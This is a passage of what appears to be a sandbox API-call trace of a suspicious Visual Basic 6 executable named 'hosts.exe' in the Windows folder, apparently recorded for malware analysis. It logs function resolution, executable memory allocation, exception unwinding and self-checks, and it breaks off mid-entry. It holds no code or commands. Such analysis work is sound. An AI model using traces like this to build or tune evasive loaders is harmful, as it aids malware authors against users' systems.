0x3424000 [0176.548] VirtualFree (lpAddress=0x3424000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0176.549] GetLastError () returned 0x12 [0176.550] SetLastError (dwErrCode=0x12) [0176.550] GetLastError () returned 0x12 [0176.550] SetLastError (dwErrCode=0x12) [0176.550] GetLastError () returned 0x12 [0176.551] SetLastError (dwErrCode=0x12) [0176.551] GetLastError () returned 0x12 [0176.551] SetLastError (dwErrCode=0x12) [0176.551] GetLastError () returned 0x12 [0176.551] SetLastError (dwErrCode=0x12) [0176.552] GetLastError () returned 0x12 [0176.552] SetLastError (dwErrCode=0x12) [0176.552] GetLastError () returned 0x12 [0176.552] SetLastError (dwErrCode=0x12) [0176.552] GetLastError () returned 0x12 [0176.553] SetLastError (dwErrCode=0x12) [0176.553] GetLastError () returned 0x12 [0176.553] SetLastError (dwErrCode=0x12) [0176.553] GetLastError () returned 0x12 [0176.554] SetLastError (dwErrCode=0x12) [0176.554] GetLastError () returned 0x12 [0176.554] SetLastError (dwErrCode=0x12) [0176.554] GetLastError () returned 0x12 [0176.554] SetLastError (dwErrCode=0x12) [0176.554] GetLastError () returned 0x12 [0176.555] SetLastError (dwErrCode=0x12) [0176.555] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0176.555] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0176.556] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0176.556] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0176.557] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0176.557] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0176.558] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0176.558] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0176.559] GetLastError () returned 0x0 [0176.559] SetLastError (dwErrCode=0x0) [0176.559] GetLastError () returned 0x0 [0176.559] SetLastError (dwErrCode=0x0) [0176.559] GetLastError () returned 0x0 [0176.560] SetLastError (dwErrCode=0x0) [0176.560] VirtualAlloc (lpAddress=0x3424000, dwSize=0xc000, flAllocationType=0x1000, flProtect=0x40) returned 0x3424000 [0176.563] VirtualFree (lpAddress=0x342c000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0176.564] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="MSVBVM60.DLL", cbMultiByte=12, lpWideCharStr=0x28edd0, cchWideChar=2047 | out: lpWideCharStr="MSVBVM60.DLL䕁㑂ぁ㘳㜵㔵㙆䈭㘸䌲䕁㠹䔴㑁い居㈰う䘱㔵䄳ㄱ䐲䕃〭䌰䐹㍂䌸㠱㕄䑆쐱Ď(䘨睝쒌Ď(V") returned 12 [0176.564] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="MSVBVM60.DLL", cchWideChar=12, lpMultiByteStr=0x28edd0, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSVBVM60.DLL6", lpUsedDefaultChar=0x0) returned 12 [0176.565] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaVarSub" | out: DestinationString="__vbaVarSub") [0176.566] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaVarSub", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a477ea) returned 0x0 [0176.567] RtlInitString (in: DestinationString=0x28fda8, SourceString="_CIcos" | out: DestinationString="_CIcos") [0176.567] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="_CIcos", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a39386) returned 0x0 [0176.568] RtlInitString (in: DestinationString=0x28fda8, SourceString="_adj_fptan" | out: DestinationString="_adj_fptan") [0176.568] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="_adj_fptan", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a309f9) returned 0x0 [0176.568] VirtualAlloc (lpAddress=0x3414000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x40) returned 0x3414000 [0176.570] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaVarMove" | out: DestinationString="__vbaVarMove") [0176.570] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaVarMove", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a46aee) returned 0x0 [0176.571] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaFreeVar" | out: DestinationString="__vbaFreeVar") [0176.571] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaFreeVar", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a46831) returned 0x0 [0176.572] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaLenBstr" | out: DestinationString="__vbaLenBstr") [0176.572] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaLenBstr", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a26a9b) returned 0x0 [0176.574] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaStrVarMove" | out: DestinationString="__vbaStrVarMove") [0176.574] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaStrVarMove", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a21929) returned 0x0 [0176.575] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaPut3" | out: DestinationString="__vbaPut3") [0176.575] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaPut3", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a256fa) returned 0x0 [0176.577] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaFreeVarList" | out: DestinationString="__vbaFreeVarList") [0176.577] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaFreeVarList", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a47262) returned 0x0 [0176.578] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaEnd" | out: DestinationString="__vbaEnd") [0176.578] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaEnd", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a0be88) returned 0x0 [0176.580] RtlInitString (in: DestinationString=0x28fda8, SourceString="_adj_fdiv_m64" | out: DestinationString="_adj_fdiv_m64") [0176.580] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="_adj_fdiv_m64", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a302ba) returned 0x0 [0176.581] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaNextEachVar" | out: DestinationString="__vbaNextEachVar") [0176.581] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaNextEachVar", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a463bc) returned 0x0 [0176.582] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaFreeObjList" | out: DestinationString="__vbaFreeObjList") [0176.583] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaFreeObjList", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a19fc3) returned 0x0 [0176.583] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name=0x0, Ordinal=0x204, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a270b7) returned 0x0 [0176.585] RtlInitString (in: DestinationString=0x28fda8, SourceString="_adj_fprem1" | out: DestinationString="_adj_fprem1") [0176.585] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="_adj_fprem1", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a30941) returned 0x0 [0176.586] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaStrCat" | out: DestinationString="__vbaStrCat") [0176.586] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaStrCat", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a26a76) returned 0x0 [0176.588] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaVarCmpNe" | out: DestinationString="__vbaVarCmpNe") [0176.588] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaVarCmpNe", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a49957) returned 0x0 [0176.589] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaSetSystemError" | out: DestinationString="__vbaSetSystemError") [0176.589] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaSetSystemError", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a0c33a) returned 0x0 [0176.591] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaHresultCheckObj" | out: DestinationString="__vbaHresultCheckObj") [0176.591] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaHresultCheckObj", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a1a274) returned 0x0 [0176.596] RtlInitString (in: DestinationString=0x28fda8, SourceString="_adj_fdiv_m32" | out: DestinationString="_adj_fdiv_m32") [0176.597] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="_adj_fdiv_m32", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a3026e) returned 0x0 [0176.598] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaVarForInit" | out: DestinationString="__vbaVarForInit") [0176.598] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaVarForInit", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a493cc) returned 0x0 [0176.599] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name=0x0, Ordinal=0x252, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a1cd3a) returned 0x0 [0176.600] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaOnError" | out: DestinationString="__vbaOnError") [0176.601] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaOnError", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a2499d) returned 0x0 [0176.602] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaObjSet" | out: DestinationString="__vbaObjSet") [0176.602] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaObjSet", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a19ff1) returned 0x0 [0176.603] RtlInitString (in: DestinationString=0x28fda8, SourceString="_adj_fdiv_m16i" | out: DestinationString="_adj_fdiv_m16i") [0176.604] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="_adj_fdiv_m16i", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a30306) returned 0x0 [0176.605] RtlInitString (in: DestinationString=0x28fda8, SourceString="__vbaObjSetAddref" | out: DestinationString="__vbaObjSetAddref") [0176.605] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="__vbaObjSetAddref", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a1a008) returned 0x0 [0176.607] RtlInitString (in: DestinationString=0x28fda8, SourceString="_adj_fdivr_m16i" | out: DestinationString="_adj_fdivr_m16i") [0176.607] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name="_adj_fdivr_m16i", Ordinal=0x0, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a30406) returned 0x0 [0176.608] LdrGetProcedureAddress (in: BaseAddress=0x72940000, Name=0x0, Ordinal=0x256, ProcedureAddress=0x28fdb0 | out: ProcedureAddress=0x28fdb0*=0x72a0e0f7) returned 0x0 [0176.633] lstrcpyA (in: lpString1=0x28fe84, lpString2="" | out: lpString1="") returned="" [0176.634] SetErrorMode (uMode=0x8001) returned 0x8001 [0176.634] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x28fb40, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\syswow64\\msvbvm60.dll")) returned 0x20 [0176.634] GetUserDefaultLCID () returned 0x409 [0176.634] lstrcpyA (in: lpString1=0x28f840, lpString2="*" | out: lpString1="*") returned="*" [0176.634] LoadStringA (in: hInstance=0x72940000, uID=0x7d1, lpBuffer=0x28fc44, cchBufferMax=8 | out: lpBuffer="409") returned 0x3 [0176.634] GetSystemDefaultLCID () returned 0x409 [0176.634] GetUserDefaultLCID () returned 0x409 [0176.635] GetLocaleInfoA (in: Locale=0x400, LCType=0xe, lpLCData=0x28fc4e, cchData=2 | out: lpLCData=".") returned 2 [0176.635] GetStockObject (i=13) returned 0x18a002e [0176.635] GetObjectA (in: h=0x18a002e, c=60, pv=0x28fc14 | out: pv=0x28fc14) returned 60 [0176.635] GetLocaleInfoA (in: Locale=0x409, LCType=0x80000003, lpLCData=0x28fc10, cchData=4 | out: lpLCData="ENU") returned 4 [0176.635] lstrcpyA (in: lpString1=0x28fc40, lpString2="EN" | out: lpString1="EN") returned="EN" [0176.635] lstrlenA (lpString="{xx}") returned 4 [0176.635] lstrlenA (lpString="VB98.CHM") returned 8 [0176.635] lstrcpyA (in: lpString1=0x72a4eae8, lpString2="VB98.CHM" | out: lpString1="VB98.CHM") returned="VB98.CHM" [0176.635] GetLocaleInfoA (in: Locale=0x409, LCType=0x80000003, lpLCData=0x28fc10, cchData=4 | out: lpLCData="ENU") returned 4 [0176.635] lstrcpyA (in: lpString1=0x28fc40, lpString2="EN" | out: lpString1="EN") returned="EN" [0176.635] lstrlenA (lpString="{xx}") returned 4 [0176.635] lstrlenA (lpString="VBENLR98.CHM") returned 12 [0176.636] lstrcpyA (in: lpString1=0x72a4ebf0, lpString2="VBENLR98.CHM" | out: lpString1="VBENLR98.CHM") returned="VBENLR98.CHM" [0176.636] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x28fd68, nSize=0x104 | out: lpFilename="C:\\windows\\hosts.exe" (normalized: "c:\\windows\\hosts.exe")) returned 0x14 [0176.636] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x28fc64, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\syswow64\\msvbvm60.dll")) returned 0x20 [0176.636] lstrcpynA (in: lpString1=0x28fb48, lpString2="C:\\Windows\\system32\\MSVBVM60.DLL", iMaxLength=260 | out: lpString1="C:\\Windows\\system32\\MSVBVM60.DLL") returned="C:\\Windows\\system32\\MSVBVM60.DLL" [0176.636] lstrlenA (lpString="C:\\Windows\\system32\\MSVBVM60.DLL") returned 32 [0176.636] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x21) returned 0xe517b0 [0176.636] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x21) returned 0xe517e0 [0176.636] lstrcpyA (in: lpString1=0xe517b0, lpString2="C:\\Windows\\system32\\MSVBVM60.DLL" | out: lpString1="C:\\Windows\\system32\\MSVBVM60.DLL") returned="C:\\Windows\\system32\\MSVBVM60.DLL" [0176.636] LCMapStringA (in: Locale=0x409, dwMapFlags=0x200, lpSrcStr="C:\\windows\\hosts.exe", cchSrc=-1, lpDestStr=0x28fb28, cchDest=260 | out: lpDestStr="C:\\WINDOWS\\HOSTS.EXE") returned 21 [0176.639] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x28fc2c, dwRevision=0x1 | out: pSecurityDescriptor=0x28fc2c) returned 1 [0176.644] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x28fc2c, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x28fc2c) returned 1 [0176.644] CreateSemaphoreA (lpSemaphoreAttributes=0x28fc40, lInitialCount=0, lMaximumCount=2147483647, lpName="C:?WINDOWS?HOSTS.EXE") returned 0x11c [0176.645] GetLastError () returned 0x0 [0176.645] GetVersionExA (in: lpVersionInformation=0x28fba4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x28fba4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0176.645] OleInitialize (pvReserved=0x0) returned 0x0 [0176.652] OaBuildVersion () returned 0x321396 [0176.653] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="OLEAUT32.DLL", cbMultiByte=12, lpWideCharStr=0x28ebcc, cchWideChar=2047 | out: lpWideCharStr="OLEAUT32.DLL(㱴瞩㲣瞩쒶癏(άč") returned 12 [0176.653] SysReAllocStringLen (in: pbstr=0x28fbd0*=0x0, psz="OLEAUT32.DLL", len=0xc | out: pbstr=0x28fbd0*="OLEAUT32.DLL") returned 1 [0176.653] CharLowerBuffW (in: lpsz="OLEAUT32.DLL", cchLength=0xc | out: lpsz="oleaut32.dll") returned 0xc [0176.654] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x775d0000 [0176.654] GetLastError () returned 0x0 [0176.654] SetLastError (dwErrCode=0x0) [0176.654] GetLastError () returned 0x0 [0176.759] GetProcAddress (hModule=0x775d0000, lpProcName="OleLoadPictureEx") returned 0x776370a1 [0176.759] RegisterClipboardFormatA (lpszFormat="Link") returned 0xc079 [0176.759] RegisterClipboardFormatA (lpszFormat="Rich Text Format") returned 0xc0b4 [0176.759] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBFocusRT6", lpWndClass=0x28fc0c | out: lpWndClass=0x28fc0c) returned 0 [0176.816] RegisterClassA (lpWndClass=0x28fc0c) returned 0x56c1bf [0176.816] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBBubbleRT6", lpWndClass=0x28fc0c | out: lpWndClass=0x28fc0c) returned 0 [0176.816] RegisterClassA (lpWndClass=0x28fc0c) returned 0x56c1c0 [0176.817] HeapCreate (flOptions=0x0, dwInitialSize=0x400, dwMaximumSize=0x0) returned 0x3740000 [0176.818] GetUserDefaultLCID () returned 0x409 [0176.818] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x3a4) returned 0xe51810 [0176.818] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x3a4) returned 0xe51bc0 [0176.818] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0xd4) returned 0xe51f70 [0176.819] GetSystemInfo (in: lpSystemInfo=0x28fbcc | out: lpSystemInfo=0x28fbcc*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x6a06)) [0176.819] VirtualAlloc (lpAddress=0x0, dwSize=0x10000, flAllocationType=0x2000, flProtect=0x4) returned 0x360000 [0176.819] VirtualAlloc (lpAddress=0x360000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x360000 [0176.820] VirtualAlloc (lpAddress=0x360000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x360000 [0176.820] VirtualAlloc (lpAddress=0x360000, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x360000 [0176.821] VirtualAlloc (lpAddress=0x360000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x360000 [0176.821] VirtualAlloc (lpAddress=0x360000, dwSize=0x5000, flAllocationType=0x1000, flProtect=0x4) returned 0x360000 [0176.822] VirtualAlloc (lpAddress=0x360000, dwSize=0x6000, flAllocationType=0x1000, flProtect=0x4) returned 0x360000 [0176.822] VirtualProtect (in: lpAddress=0x360000, dwSize=0x6000, flNewProtect=0x20, lpflOldProtect=0x28fc28 | out: lpflOldProtect=0x28fc28*=0x4) returned 1 [0176.823] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x360000, dwSize=0x6000) returned 1 [0176.823] GlobalAddAtomA (lpString="VBDisabled") returned 0xc164 [0176.823] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="oleaut32.dll", cbMultiByte=12, lpWideCharStr=0x28eb88, cchWideChar=2047 | out: lpWideCharStr="oleaut32.dll\x18") returned 12 [0176.824] SysReAllocStringLen (in: pbstr=0x28fb8c*=0x0, psz="oleaut32.dll", len=0xc | out: pbstr=0x28fb8c*="oleaut32.dll") returned 1 [0176.824] CharLowerBuffW (in: lpsz="oleaut32.dll", cchLength=0xc | out: lpsz="oleaut32.dll") returned 0xc [0176.824] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x775d0000 [0176.825] GetProcAddress (hModule=0x775d0000, lpProcName="DispCallFunc") returned 0x775e3dcf [0176.826] GetProcAddress (hModule=0x775d0000, lpProcName="LoadTypeLibEx") returned 0x775e07b7 [0176.826] GetProcAddress (hModule=0x775d0000, lpProcName="UnRegisterTypeLib") returned 0x77601ca9 [0176.831] GetProcAddress (hModule=0x775d0000, lpProcName="CreateTypeLib2") returned 0x775e8e70 [0176.832] GetProcAddress (hModule=0x775d0000, lpProcName="VarDateFromUdate") returned 0x775e7684 [0176.832] GetProcAddress (hModule=0x775d0000, lpProcName="VarUdateFromDate") returned 0x775ecc98 [0176.832] GetProcAddress (hModule=0x775d0000, lpProcName="GetAltMonthNames") returned 0x7761903a [0176.833] GetProcAddress (hModule=0x775d0000, lpProcName="VarNumFromParseNum") returned 0x775e6231 [0176.833] GetProcAddress (hModule=0x775d0000, lpProcName="VarParseNumFromStr") returned 0x775e5fea [0176.833] GetProcAddress (hModule=0x775d0000, lpProcName="VarDecFromR4") returned 0x775f3f94 [0176.834] GetProcAddress (hModule=0x775d0000, lpProcName="VarDecFromR8") returned 0x775f4e9e [0176.834] GetProcAddress (hModule=0x775d0000, lpProcName="VarDecFromDate") returned 0x7761db72 [0176.834] GetProcAddress (hModule=0x775d0000, lpProcName="VarDecFromI4") returned 0x77602a8c [0176.835] GetProcAddress (hModule=0x775d0000, lpProcName="VarDecFromCy") returned 0x7761d737 [0176.835] GetProcAddress (hModule=0x775d0000, lpProcName="VarR4FromDec") returned 0x7761e015 [0176.835] GetProcAddress (hModule=0x775d0000, lpProcName="GetRecordInfoFromTypeInfo") returned 0x7761cc3d [0176.836] GetProcAddress (hModule=0x775d0000, lpProcName="GetRecordInfoFromGuids") returned 0x7761d1c4 [0176.836] GetProcAddress (hModule=0x775d0000, lpProcName="SafeArrayGetRecordInfo") returned 0x7761d48c [0176.836] GetProcAddress (hModule=0x775d0000, lpProcName="SafeArraySetRecordInfo") returned 0x7761d4c6 [0176.837] GetProcAddress (hModule=0x775d0000, lpProcName="SafeArrayGetIID") returned 0x7761d509 [0176.837] GetProcAddress (hModule=0x775d0000, lpProcName="SafeArraySetIID") returned 0x775ee7bb [0176.837] GetProcAddress (hModule=0x775d0000, lpProcName="SafeArrayCopyData") returned 0x775ee496 [0176.838] GetProcAddress (hModule=0x775d0000, lpProcName="SafeArrayAllocDescriptorEx") returned 0x775eddf1 [0176.838] GetProcAddress (hModule=0x775d0000, lpProcName="SafeArrayCreateEx") returned 0x7761d53f [0176.838] GetProcAddress (hModule=0x775d0000, lpProcName="VarFormat") returned 0x77622055 [0176.839] GetProcAddress (hModule=0x775d0000, lpProcName="VarFormatDateTime") returned 0x776220ea [0176.839] GetProcAddress (hModule=0x775d0000, lpProcName="VarFormatNumber") returned 0x77622151 [0176.839] GetProcAddress (hModule=0x775d0000, lpProcName="VarFormatPercent") returned 0x776221f5 [0176.840] GetProcAddress (hModule=0x775d0000, lpProcName="VarFormatCurrency") returned 0x77622288 [0176.840] GetProcAddress (hModule=0x775d0000, lpProcName="VarWeekdayName") returned 0x77622335 [0176.840] GetProcAddress (hModule=0x775d0000, lpProcName="VarMonthName") returned 0x776223d5 [0176.841] GetProcAddress (hModule=0x775d0000, lpProcName="VarAdd") returned 0x775f5934 [0176.841] GetProcAddress (hModule=0x775d0000, lpProcName="VarAnd") returned 0x775f5a98 [0176.841] GetProcAddress (hModule=0x775d0000, lpProcName="VarCat") returned 0x775f59b4 [0176.847] GetProcAddress (hModule=0x775d0000, lpProcName="VarDiv") returned 0x7764e405 [0176.847] GetProcAddress (hModule=0x775d0000, lpProcName="VarEqv") returned 0x7764ef07 [0176.848] GetProcAddress (hModule=0x775d0000, lpProcName="VarIdiv") returned 0x7764f00a [0176.848] GetProcAddress (hModule=0x775d0000, lpProcName="VarImp") returned 0x7764ef47 [0176.848] GetProcAddress (hModule=0x775d0000, lpProcName="VarMod") returned 0x7764f15e [0176.849] GetProcAddress (hModule=0x775d0000, lpProcName="VarMul") returned 0x7764dbd4 [0176.849] GetProcAddress (hModule=0x775d0000, lpProcName="VarOr") returned 0x7764ecfa [0176.849] GetProcAddress (hModule=0x775d0000, lpProcName="VarPow") returned 0x7764ea66 [0176.850] GetProcAddress (hModule=0x775d0000, lpProcName="VarSub") returned 0x7764d332 [0176.850] GetProcAddress (hModule=0x775d0000, lpProcName="VarXor") returned 0x7764ee2e [0176.850] GetProcAddress (hModule=0x775d0000, lpProcName="VarAbs") returned 0x7764ca11 [0176.851] GetProcAddress (hModule=0x775d0000, lpProcName="VarFix") returned 0x7764cc5f [0176.851] GetProcAddress (hModule=0x775d0000, lpProcName="VarInt") returned 0x7764cde7 [0176.851] GetProcAddress (hModule=0x775d0000, lpProcName="VarNeg") returned 0x7764c802 [0176.852] GetProcAddress (hModule=0x775d0000, lpProcName="VarNot") returned 0x7764ec66 [0176.852] GetProcAddress (hModule=0x775d0000, lpProcName="VarRound") returned 0x7764d155 [0176.852] GetProcAddress (hModule=0x775d0000, lpProcName="VarCmp") returned 0x775eb0dc [0176.852] GetProcAddress (hModule=0x775d0000, lpProcName="VarDecAdd") returned 0x77605f3e [0176.853] GetProcAddress (hModule=0x775d0000, lpProcName="VarDecCmp") returned 0x775f4fd0 [0176.853] GetProcAddress (hModule=0x775d0000, lpProcName="VarBstrCat") returned 0x775f0d2c [0176.853] GetProcAddress (hModule=0x775d0000, lpProcName="VarCyMulI4") returned 0x776059ed [0176.854] GetProcAddress (hModule=0x775d0000, lpProcName="VarBstrCmp") returned 0x775df8b8 [0176.854] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="ole32.dll", cbMultiByte=9, lpWideCharStr=0x28eb94, cchWideChar=2047 | out: lpWideCharStr="ole32.dll(\x0c") returned 9 [0176.854] SysReAllocStringLen (in: pbstr=0x28fb98*=0x0, psz="ole32.dll", len=0x9 | out: pbstr=0x28fb98*="ole32.dll") returned 1 [0176.855] CharLowerBuffW (in: lpsz="ole32.dll", cchLength=0x9 | out: lpsz="ole32.dll") returned 0x9 [0176.855] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76c60000 [0176.855] GetProcAddress (hModule=0x76c60000, lpProcName="CoCreateInstanceEx") returned 0x76ca9d4e [0176.856] GetProcAddress (hModule=0x76c60000, lpProcName="CLSIDFromProgIDEx") returned 0x76c70782 [0176.856] GetSystemMetrics (nIndex=42) returned 0 [0176.856] CoGetMalloc (in: dwMemContext=0x1, ppMalloc=0x72a4e688 | out: ppMalloc=0x72a4e688*=0x76da66bc) returned 0x0 [0176.856] IMalloc:Alloc (This=0x76da66bc, cb=0x4) returned 0x10f1d28 [0176.857] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x28f940, nSize=0x104 | out: lpFilename="C:\\windows\\hosts.exe" (normalized: "c:\\windows\\hosts.exe")) returned 0x14 [0176.857] lstrcatA (in: lpString1="C:\\windows\\hosts.exe", lpString2=".cfg" | out: lpString1="C:\\windows\\hosts.exe.cfg") returned="C:\\windows\\hosts.exe.cfg" [0176.857] SetLastError (dwErrCode=0x0) [0176.857] SearchPathA (in: lpPath=0x0, lpFileName="C:\\windows\\hosts.exe.cfg", lpExtension=0x0, nBufferLength=0x103, lpBuffer=0x28f83c, lpFilePart=0x28f810 | out: lpBuffer="Tú(", lpFilePart=0x28f810) returned 0x0 [0176.926] SetLastError (dwErrCode=0x2) [0176.926] GetLastError () returned 0x2 [0176.926] lstrcmpiA (lpString1="hosts", lpString2="MTX") returned -1 [0176.927] lstrcmpiA (lpString1="hosts", lpString2="DLLHOST") returned 1 [0176.927] lstrcmpiA 